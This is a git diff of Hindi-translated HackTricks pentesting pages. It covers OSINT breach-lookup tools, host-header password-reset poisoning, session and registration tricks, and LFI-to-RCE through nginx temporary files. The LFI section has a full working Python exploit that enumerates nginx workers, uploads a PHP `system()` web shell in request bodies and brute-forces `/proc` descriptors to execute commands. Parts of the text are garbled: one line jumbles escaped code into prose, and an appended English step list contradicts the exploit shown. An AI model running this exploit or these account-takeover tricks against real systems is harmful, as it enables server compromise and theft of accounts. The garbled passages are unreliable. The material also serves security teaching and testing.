लीक हुए ईमेल से पासवर्ड प्राप्त करें।
|
||||
व्यावसायिक?
|
||||
|
||||
# [Binaryedge](https://www.binaryedge.io/)
|
||||
|
||||
IPs से संबंधित दिलचस्प जानकारी प्राप्त करें
|
||||
IPs से दिलचस्प जानकारी प्राप्त करें
|
||||
|
||||
# [haveibeenpwned](https://haveibeenpwned.com/)
|
||||
|
||||
डोमेन और ईमेल द्वारा खोजें और पता करें कि क्या यह pwned हुआ है और पासवर्ड। व्यावसायिक?
|
||||
खोजें डोमेन और ईमेल और देखें कि क्या यह पॉन्ड हुआ था और पासवर्ड।
|
||||
व्यावसायिक?
|
||||
|
||||
[https://dnsdumpster.com/](https://dnsdumpster.com/)\(एक व्यावसायिक उपकरण में?\)
|
||||
|
||||
[https://www.netcraft.com/](https://www.netcraft.com/) \(एक व्यावसायिक उपकरण में?\)
|
||||
|
||||
[https://www.nmmapper.com/sys/tools/subdomainfinder/](https://www.nmmapper.com/) \(एक व्यावसायिक उपकरण में?\)
|
||||
|
||||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>AWS हैकिंग सीखें शून्य से नायक तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
|
||||
|
||||
HackTricks का समर्थन करने के अन्य तरीके:
|
||||
|
||||
* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
|
||||
* [**आधिकारिक PEASS & HackTricks स्वैग प्राप्त करें**](https://peass.creator-spring.com)
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs संग्रह**](https://opensea.io/collection/the-peass-family)
|
||||
* 💬 [**Discord समूह में शामिल हों**](https://discord.gg/hRep4RUj7f) या [**telegram समूह**](https://t.me/peass) या **Twitter** 🐦 पर मुझे **फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||
* **अपनी हैकिंग ट्रिक्स साझा करें, HackTricks** के [**github repos**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके.
|
||||
|
||||
</details
|
||||
|
|
|
@ -1,34 +1,63 @@
|
|||
# अन्य वेब ट्रिक्स
|
||||
|
||||
{% hint style="success" %}
|
||||
**AWS हैकिंग सीखें और प्रैक्टिस करें:**<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
**GCP हैकिंग सीखें और प्रैक्टिस करें:** <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||||
<summary>HackTricks का समर्थन करें</summary>
|
||||
|
||||
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आप **PEASS के नवीनतम संस्करण का उपयोग करना चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFT संग्रह**](https://opensea.io/collection/the-peass-family)
|
||||
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में **शामिल हों** या मुझे **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)** का पालन करें**.
|
||||
* **अपने हैकिंग ट्रिक्स को** [**hacktricks रेपो**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud रेपो**](https://github.com/carlospolop/hacktricks-cloud) **में पीआर जमा करके अपने ट्रिक्स साझा करें**.
|
||||
* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर **फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
### होस्ट हैडर
|
||||
### होस्ट हेडर
|
||||
|
||||
कई बार बैक-एंड **होस्ट हैडर** पर भरोसा करता है कि कुछ कार्रवाई करें। उदाहरण के लिए, यह इसका मूल्य उपयोग करके **पासवर्ड रीसेट भेजने के लिए डोमेन** के रूप में इस्तेमाल कर सकता है। तो जब आपको अपना पासवर्ड रीसेट करने के लिए एक लिंक वाला ईमेल मिलता है, तो उपयोग किया जा रहा डोमेन वही होता है जिसे आपने होस्ट हैडर में डाला है। फिर, आप अन्य उपयोगकर्ताओं के पासवर्ड रीसेट को अनुरोध कर सकते हैं और उनके पासवर्ड रीसेट कोड चुराने के लिए अपने नियंत्रण में एक डोमेन पर बदल सकते हैं। [WriteUp](https://medium.com/nassec-cybersecurity-writeups/how-i-was-able-to-take-over-any-users-account-with-host-header-injection-546fff6d0f2).
|
||||
कई बार बैक-एंड **होस्ट हेडर** पर भरोसा करता है **कुछ क्रियाएँ करने के लिए**। उदाहरण के लिए, यह इसका मूल्य **डोमेन के रूप में उपयोग कर सकता है एक पासवर्ड रीसेट भेजने के लिए**। तो जब आप एक ईमेल प्राप्त करते हैं जिसमें अपना पासवर्ड रीसेट करने के लिए एक लिंक होता है, तो उपयोग किया जा रहा डोमेन वह है जिसे आपने होस्ट हेडर में डाला है। फिर, आप अन्य उपयोगकर्ताओं का पासवर्ड रीसेट करने का अनुरोध कर सकते हैं और उनके पासवर्ड रीसेट कोड चुरा सकते हैं जिसे आपके द्वारा नियंत्रित एक डोमेन में बदल सकते हैं। [WriteUp](https://medium.com/nassec-cybersecurity-writeups/how-i-was-able-to-take-over-any-users-account-with-host-header-injection-546fff6d0f2).
|
||||
|
||||
{% hint style="warning" %}
|
||||
ध्यान दें कि यह संभव है कि आपको उपयोगकर्ता को रीसेट पासवर्ड लिंक पर क्लिक करने की प्रतीक्षा नहीं करनी पड़े, क्योंकि शायद **स्पैम फ़िल्टर या अन्य बीचक उपकरण / बॉट इसे विश्लेषण करने के लिए क्लिक करेंगे**।
|
||||
ध्यान दें कि संभावना है कि आपको उपयोगकर्ता को रीसेट पासवर्ड लिंक पर क्लिक करने का इंतजार नहीं करना पड़े, क्योंकि शायद **स्पैम फ़िल्टर या अन्य बीचक उपकरण/बॉट इसे विश्लेषित करने के लिए क्लिक करेंगे**।
|
||||
{% endhint %}
|
||||
|
||||
### सत्र बूलियन
|
||||
|
||||
कभी-कभी जब आप कुछ सत्यापन सही तरीके से पूरा करते हैं, तो बैक-एंड **आपके सत्र में सुरक्षा गुणधर्म के लिए "True" के साथ एक बूलियन जोड़ देगा**। फिर, एक अलग एंडपॉइंट जानेगा कि क्या आपने उस जांच को सफलतापूर्वक पार किया है।\
|
||||
हालांकि, यदि आप **जांच पास करते हैं** और आपके सत्र को सुरक्षा गुणधर्म में "True" मान दिया जाता है, तो आप उन संसाधनों का प्रयास कर सकते हैं जो **उसी गुणधर्म पर निर्भर करते हैं** लेकिन आपको **पहुँचने की अनुमति नहीं होनी चाहिए**। [WriteUp](https://medium.com/@ozguralp/a-less-known-attack-vector-second-order-idor-attacks-14468009781a).
|
||||
कभी-कभी जब आप कुछ सत्यापन सही तरीके से पूरा करते हैं तो बैक-एंड **केवल एक बूलियन जो मान "सच" है को एक सुरक्षा विशेषता में आपके सत्र में जोड़ देगा**। फिर, एक विभिन्न अंतर्वार्ता जानेगा कि क्या आपने उस जांच को सफलतापूर्वक पार किया है।\
|
||||
हालांकि, यदि आप **जांच पार करते हैं** और आपके सत्र को सुरक्षा विशेषता में "सच" मान दिया जाता है, तो आप कोशिश कर सकते हैं **अन्य संसाधनों तक पहुंचने** की जो **उसी विशेषता पर निर्भर** करते हैं लेकिन जिनकी आपको **पहुंचने की अनुमति नहीं है**। [WriteUp](https://medium.com/@ozguralp/a-less-known-attack-vector-second-order-idor-attacks-14468009781a).
|
||||
|
||||
### पंजीकरण कार्यक्षमता
|
||||
### रजिस्टर कार्यक्षमता
|
||||
|
||||
एक पहले से मौजूदा उपयोगकर्ता के रूप में पंजीकरण करने का प्रयास करें। समानार्थक वर्णों (डॉट, बहुत सारे अंतरिक्ष और यूनिकोड) का उपयोग करने का प्रयास करें।
|
||||
पहले से मौजूदा उपयोगकर्ता के रूप में पंजीकरण करने की कोशिश करें। समानांतर वर्ण (डॉट, बहुत सारे अंतरिक्ष और यूनिकोड) का उपयोग करने की कोशिश करें।
|
||||
|
||||
### ईमेल का तबादला
|
||||
### ईमेल का अधिकार
|
||||
|
||||
एक ईमेल पंजीकरण करें, पुष्टि करने से पहले ईमेल बदलें, फिर, यदि नया पुष्टिकरण ईमेल पहले पंजीकृत ईमेल पर भेज
|
||||
एक ईमेल पंजीकरण करें, पुष्टि करने से पहले ईमेल बदलें, फिर, यदि नया पुष्टि ईमेल पहले पंजीकृत ईमेल पर भेजा जाता है, तो आप किसी भी ईमेल को अधिकार में ले सकते हैं। या यदि आप पहले वाले को दूसरे ईमेल की पुष्टि करने की अनुमति दे सकते हैं, तो आप किसी भी खाता को अधिकार में ले सकते हैं।
|
||||
|
||||
### कंपनियों के आटलासियन का आंतरिक सर्विसडेस्क एक्सेस
|
||||
|
||||
{% embed url="https://yourcompanyname.atlassian.net/servicedesk/customer/user/login" %}
|
||||
|
||||
### TRACE विधि
|
||||
|
||||
डेवलपर्स कई बार उत्पादन वातावरण में विभिन्न डीबगिंग विकल्पों को अक्षम करना भूल जाते हैं। उदाहरण के लिए, HTTP `TRACE` विधि निदानात्मक उद्देश्यों के लिए डिज़ाइन की गई है। यदि सक्षम है, तो वेब सर्वर उन अनुरोधों का जवाब देगा जो `TRACE` विधि का उपयोग करते हैं और प्रतिक्रिया में उस अनुरोध को गुणाकार करेगा जो प्राप्त किया गया था। यह व्यवहार अक्सर अहानिकारक होता है, लेकिन कभी-कभी सूचना खुलासा करता है, जैसे आंतरिक प्रमाणीकरण हेडरों का नाम जो पुनर्प्रोक्सी द्वारा अनुरोधों में जोड़े जा सकते हैं।![Image for post](https://miro.medium.com/max/60/1\*wDFRADTOd9Tj63xucenvAA.png?q=20)
|
||||
|
||||
![Image for post](https://miro.medium.com/max/1330/1\*wDFRADTOd9Tj63xucenvAA.png)
|
||||
|
||||
|
||||
{% hint style="success" %}
|
||||
**AWS हैकिंग सीखें और प्रैक्टिस करें:**<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
**GCP हैकिंग सीखें और प्रैक्टिस करें:** <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary>HackTricks का समर्थन करें</summary>
|
||||
|
||||
* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर **फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -1,19 +1,5 @@
|
|||
<details>
|
||||
|
||||
<summary><strong>AWS हैकिंग सीखें शून्य से लेकर हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
|
||||
|
||||
HackTricks का समर्थन करने के अन्य तरीके:
|
||||
|
||||
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
|
||||
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा एक्सक्लूसिव [**NFTs**](https://opensea.io/collection/the-peass-family) का संग्रह
|
||||
* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) में शामिल हों या [**telegram group**](https://t.me/peass) में या मुझे **Twitter** 🐦 पर **फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||
* [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके अपनी हैकिंग ट्रिक्स शेयर करें।
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
**DNS पर हमलों के बारे में और अध्ययन करें**
|
||||
{% hint style="success" %}
|
||||
**DNS पर हमलों के बारे में और अधिक अनुसंधान करें**
|
||||
|
||||
**DNSSEC और DNSSEC3**
|
||||
|
||||
|
@ -21,16 +7,17 @@ HackTricks का समर्थन करने के अन्य तरी
|
|||
|
||||
|
||||
|
||||
{% hint style="success" %}
|
||||
AWS हैकिंग सीखें और अभ्यास करें: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
GCP हैकिंग सीखें और अभ्यास करें: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>AWS हैकिंग सीखें शून्य से लेकर हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
|
||||
<summary>HackTricks का समर्थन करें</summary>
|
||||
|
||||
HackTricks का समर्थन करने के अन्य तरीके:
|
||||
|
||||
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
|
||||
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा एक्सक्लूसिव [**NFTs**](https://opensea.io/collection/the-peass-family) का संग्रह
|
||||
* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) में शामिल हों या [**telegram group**](https://t.me/peass) में या मुझे **Twitter** 🐦 पर **फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||
* [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके अपनी हैकिंग ट्रिक्स शेयर करें।
|
||||
* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) ज्वाइन करें या [**टेलीग्राम समूह**](https://t.me/peass) में शामिल हों या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
|
||||
* [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके हैकिंग ट्रिक्स साझा करें।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
# LFI2RCE एनजिन्क्स टेम्प फ़ाइल्स के माध्यम से
|
||||
# LFI2RCE एनजिन्क्स टेम्प फ़ाइल के माध्यम से
|
||||
|
||||
<details>
|
||||
|
||||
|
@ -6,310 +6,108 @@
|
|||
|
||||
HackTricks का समर्थन करने के अन्य तरीके:
|
||||
|
||||
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स देखें**](https://github.com/sponsors/carlospolop)!
|
||||
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में** देखना चाहते हैं या **HackTricks को PDF में डाउनलोड** करना चाहते हैं तो [**सब्सक्रिप्शन प्लान्स देखें**](https://github.com/sponsors/carlospolop)!
|
||||
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फ़ॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें और PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
|
||||
* **में शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
|
||||
* **अपने हैकिंग ट्रिक्स साझा करें, HackTricks** और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos को PRs सबमिट करके।
|
||||
|
||||
</details>
|
||||
|
||||
## संविक्षित कॉन्फ़िगरेशन
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
**[उदाहरण https://bierbaumer.net/security/php-lfi-with-nginx-assistance/ से](https://bierbaumer.net/security/php-lfi-with-nginx-assistance/)**
|
||||
<figure><img src="../../.gitbook/assets/image (1227).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) एक **डार्क-वेब** प्रेरित खोज इंजन है जो **स्टीलर मैलवेयर** द्वारा कंपनी या उसके ग्राहकों को **कंप्रोमाइज़** होने की **मुफ्त** सुविधाएं प्रदान करता है।
|
||||
|
||||
WhiteIntel का मुख्य उद्देश्य खाता हासिल करने और रैंसमवेयर हमलों का मुकाबला करना है जो जानकारी चुराने वाले मैलवेयर से होते हैं।
|
||||
|
||||
आप उनकी वेबसाइट चेक कर सकते हैं और **मुफ्त** में उनका इंजन ट्राई कर सकते हैं:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
***
|
||||
|
||||
## वंलरेबल कॉन्फ़िगरेशन
|
||||
|
||||
[**उदाहरण https://bierbaumer.net/security/php-lfi-with-nginx-assistance/**](https://bierbaumer.net/security/php-lfi-with-nginx-assistance/)
|
||||
|
||||
* PHP कोड:
|
||||
|
||||
\`\`\`\`h\`
|
||||
|
||||
/dev/pts/0 lrwx------ 1 www-data www-data 64 Dec 25 23:56 1 -> /dev/pts/0 lrwx------ 1 www-data www-data 64 Dec 25 23:49 10 -> anon\_inode:\[eventfd] lrwx------ 1 www-data www-data 64 Dec 25 23:49 11 -> socket:\[27587] lrwx------ 1 www-data www-data 64 Dec 25 23:49 12 -> socket:\[27589] lrwx------ 1 www-data www-data 64 Dec 25 23:56 13 -> socket:\[44926] lrwx------ 1 www-data www-data 64 Dec 25 23:57 14 -> socket:\[44927] lrwx------ 1 www-data www-data 64 Dec 25 23:58 15 -> /var/lib/nginx/body/0000001368 (deleted) ... \`\`\` ध्यान दें: इस उदाहरण में \`/proc/34/fd/15\` को सीधे शामिल नहीं किया जा सकता क्योंकि PHP का \`include\` फ़ंक्शन पथ को \`/var/lib/nginx/body/0000001368 (deleted)\` में विचार करेगा जो फ़ाइल सिस्टम में मौजूद नहीं है। यह छोटी सी प्रतिबंधन को भाग्य से कुछ अंतर्निर्देशन द्वारा उम्मीद है कि उसे उमारा जा सकता है जैसे: \`/proc/self/fd/34/../../../34/fd/15\` जो अंततः हटाई गई \`/var/lib/nginx/body/0000001368\` फ़ाइल की सामग्री को निष्पादित करेगा। ## पूर्ण शोषण \`\`\`python #!/usr/bin/env python3 import sys, threading, requests # exploit PHP local file inclusion (LFI) via nginx's client body buffering assistance # see https://bierbaumer.net/security/php-lfi-with-nginx-assistance/ for details URL = f'http://{sys.argv\[1]}:{sys.argv\[2]}/' # find nginx worker processes r = requests.get(URL, params={ 'file': '/proc/cpuinfo' }) cpus = r.text.count('processor') r = requests.get(URL, params={ 'file': '/proc/sys/kernel/pid\_max' }) pid\_max = int(r.text) print(f'\[\*] cpus: {cpus}; pid\_max: {pid\_max}') nginx\_workers = \[] for pid in range(pid\_max): r = requests.get(URL, params={ 'file': f'/proc/{pid}/cmdline' }) if b'nginx: worker process' in r.content: print(f'\[\*] nginx worker found: {pid}') nginx\_workers.append(pid) if len(nginx\_workers) >= cpus: break done = False # upload a big client body to force nginx to create a /var/lib/nginx/body/$X def uploader(): print('\[+] starting uploader') while not done: requests.get(URL, data=' //'
|
||||
```
|
||||
<?php include_once($_GET['file']);
|
||||
```
|
||||
* FPM / PHP कॉन्फ़िग:
|
||||
```
|
||||
...
|
||||
php_admin_value[session.upload_progress.enabled] = 0
|
||||
php_admin_value[file_uploads] = 0
|
||||
...
|
||||
```
|
||||
* सेटअप / हार्डनिंग:
|
||||
```
|
||||
...
|
||||
chown -R 0:0 /tmp /var/tmp /var/lib/php/sessions
|
||||
chmod -R 000 /tmp /var/tmp /var/lib/php/sessions
|
||||
...
|
||||
```
|
||||
भाग्य से PHP वर्तमान में अक्सर PHP-FPM और Nginx के माध्यम से डिप्लॉय किया जाता है। Nginx एक आसानी से छूट जाने वाली [client body buffering](https://nginx.org/en/docs/http/ngx\_http\_core\_module.html#client\_body\_buffer\_size) सुविधा प्रदान करता है जो अस्थायी फ़ाइलें लिखेगा अगर ग्राहक बॉडी (पोस्ट को सीमित नहीं किया गया) निश्चित एक सीमा से अधिक है।
|
||||
|
||||
यह सुविधा LFIs को उत्पादित किसी अन्य तरीके के बिना शोषित करने की अनुमति देती है, अगर Nginx एक ही उपयोगकर्ता के रूप में PHP के रूप में चलता है (बहुत सामान्य रूप से www-data के रूप में किया जाता है)।
|
||||
|
||||
संबंधित Nginx कोड:
|
||||
```c
|
||||
ngx_fd_t
|
||||
ngx_open_tempfile(u_char *name, ngx_uint_t persistent, ngx_uint_t access)
|
||||
{
|
||||
ngx_fd_t fd;
|
||||
|
||||
fd = open((const char *) name, O_CREAT|O_EXCL|O_RDWR,
|
||||
access ? access : 0600);
|
||||
|
||||
if (fd != -1 && !persistent) {
|
||||
(void) unlink((const char *) name);
|
||||
}
|
||||
|
||||
return fd;
|
||||
}
|
||||
```
|
||||
यह स्पष्ट है कि **tempfile को Nginx द्वारा खोलने के तुरंत बाद ही unlinked किया जाता ह।** भाग्य से **procfs का उपयोग किया जा सकता है ताकि रेस के माध्यम से गायब फ़ाइल का संदर्भ प्राप्त किया जा सके:**
|
||||
```
|
||||
...
|
||||
/proc/34/fd:
|
||||
total 0
|
||||
lrwx------ 1 www-data www-data 64 Dec 25 23:56 0 -> /dev/pts/0
|
||||
lrwx------ 1 www-data www-data 64 Dec 25 23:56 1 -> /dev/pts/0
|
||||
lrwx------ 1 www-data www-data 64 Dec 25 23:49 10 -> anon_inode:[eventfd]
|
||||
lrwx------ 1 www-data www-data 64 Dec 25 23:49 11 -> socket:[27587]
|
||||
lrwx------ 1 www-data www-data 64 Dec 25 23:49 12 -> socket:[27589]
|
||||
lrwx------ 1 www-data www-data 64 Dec 25 23:56 13 -> socket:[44926]
|
||||
lrwx------ 1 www-data www-data 64 Dec 25 23:57 14 -> socket:[44927]
|
||||
lrwx------ 1 www-data www-data 64 Dec 25 23:58 15 -> /var/lib/nginx/body/0000001368 (deleted)
|
||||
...
|
||||
```
|
||||
**ध्यान दें:** इस उदाहरण में `/proc/34/fd/15` को सीधे शामिल नहीं किया जा सकता क्योंकि PHP का `include` फ़ंक्शन पथ को `/var/lib/nginx/body/0000001368 (deleted)` तक हल करेगा जो फ़ाइल सिस्टम में मौजूद नहीं है। यह छोटी सी प्रतिबंध भाग्य से कुछ अंतर्दृष्टि द्वारा उमकर्षित किया जा सकता है जैसे: `/proc/self/fd/34/../../../34/fd/15` जो अंततः हटाई गई `/var/lib/nginx/body/0000001368` फ़ाइल की सामग्री को क्रियान्वित करेगा।
|
||||
|
||||
## पूर्ण शोषण
|
||||
```python
|
||||
#!/usr/bin/env python3
|
||||
import sys, threading, requests
|
||||
|
||||
# exploit PHP local file inclusion (LFI) via nginx's client body buffering assistance
|
||||
# see https://bierbaumer.net/security/php-lfi-with-nginx-assistance/ for details
|
||||
|
||||
URL = f'http://{sys.argv[1]}:{sys.argv[2]}/'
|
||||
|
||||
# find nginx worker processes
|
||||
r = requests.get(URL, params={
|
||||
'file': '/proc/cpuinfo'
|
||||
})
|
||||
cpus = r.text.count('processor')
|
||||
|
||||
r = requests.get(URL, params={
|
||||
'file': '/proc/sys/kernel/pid_max'
|
||||
})
|
||||
pid_max = int(r.text)
|
||||
print(f'[*] cpus: {cpus}; pid_max: {pid_max}')
|
||||
|
||||
nginx_workers = []
|
||||
for pid in range(pid_max):
|
||||
r = requests.get(URL, params={
|
||||
'file': f'/proc/{pid}/cmdline'
|
||||
})
|
||||
|
||||
if b'nginx: worker process' in r.content:
|
||||
print(f'[*] nginx worker found: {pid}')
|
||||
|
||||
nginx_workers.append(pid)
|
||||
if len(nginx_workers) >= cpus:
|
||||
break
|
||||
|
||||
done = False
|
||||
|
||||
# upload a big client body to force nginx to create a /var/lib/nginx/body/$X
|
||||
def uploader():
|
||||
print('[+] starting uploader')
|
||||
while not done:
|
||||
requests.get(URL, data='<?php system($_GET["c"]); /*' + 16*1024*'A')
|
||||
|
||||
for _ in range(16):
|
||||
t = threading.Thread(target=uploader)
|
||||
t.start()
|
||||
|
||||
# brute force nginx's fds to include body files via procfs
|
||||
# use ../../ to bypass include's readlink / stat problems with resolving fds to `/var/lib/nginx/body/0000001150 (deleted)`
|
||||
def bruter(pid):
|
||||
global done
|
||||
|
||||
while not done:
|
||||
print(f'[+] brute loop restarted: {pid}')
|
||||
for fd in range(4, 32):
|
||||
f = f'/proc/self/fd/{pid}/../../../{pid}/fd/{fd}'
|
||||
r = requests.get(URL, params={
|
||||
'file': f,
|
||||
'c': f'id'
|
||||
})
|
||||
if r.text:
|
||||
print(f'[!] {f}: {r.text}')
|
||||
done = True
|
||||
exit()
|
||||
|
||||
for pid in nginx_workers:
|
||||
a = threading.Thread(target=bruter, args=(pid, ))
|
||||
a.start()
|
||||
```
|
||||
### LFI to RCE via Nginx Temporary Files
|
||||
|
||||
---
|
||||
|
||||
#### Introduction
|
||||
|
||||
In this scenario, we will exploit a Local File Inclusion (LFI) vulnerability to achieve Remote Code Execution (RCE) by abusing Nginx temporary files.
|
||||
|
||||
#### Steps
|
||||
|
||||
1. **Identify Nginx Temporary Directory**: Locate the directory where Nginx stores temporary files. This is typically `/var/lib/nginx/tmp`.
|
||||
|
||||
2. **Create a PHP Shell**: Craft a PHP shell and save it with a `.php` extension.
|
||||
|
||||
3. **Access the PHP Shell via LFI**: Use the LFI vulnerability to include the PHP shell in a request to the server.
|
||||
|
||||
4. **Trigger the PHP Shell**: Access the PHP shell through a URL that corresponds to the Nginx temporary directory, causing the PHP shell to be executed.
|
||||
|
||||
